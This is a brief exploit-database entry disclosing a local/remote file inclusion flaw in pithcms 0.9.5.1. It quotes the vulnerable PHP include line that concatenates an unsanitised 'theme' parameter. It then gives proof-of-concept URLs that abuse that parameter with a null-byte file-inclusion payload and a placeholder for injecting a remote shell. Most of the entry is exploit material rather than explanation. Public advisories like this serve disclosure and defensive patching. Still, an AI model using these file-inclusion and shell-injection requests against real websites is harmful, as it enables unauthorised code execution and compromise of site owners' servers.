exploit-db-mirror/exploits/php/webapps/14271.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

19 lines
No EOL
518 B
Text

Title: pithcms (theme) Local / remote File inclusion VUlnerability
Version: 0.9.5.1
download: http://sourceforge.net/projects/pithcms/files/
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
=====================================================================
-=[ CODE ]=-
include ("templates/".$theme."/index.php");
-=[ P0C ]=-
http://127.0.0.1/path/index.php?theme= [LFI]%00
htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |=========================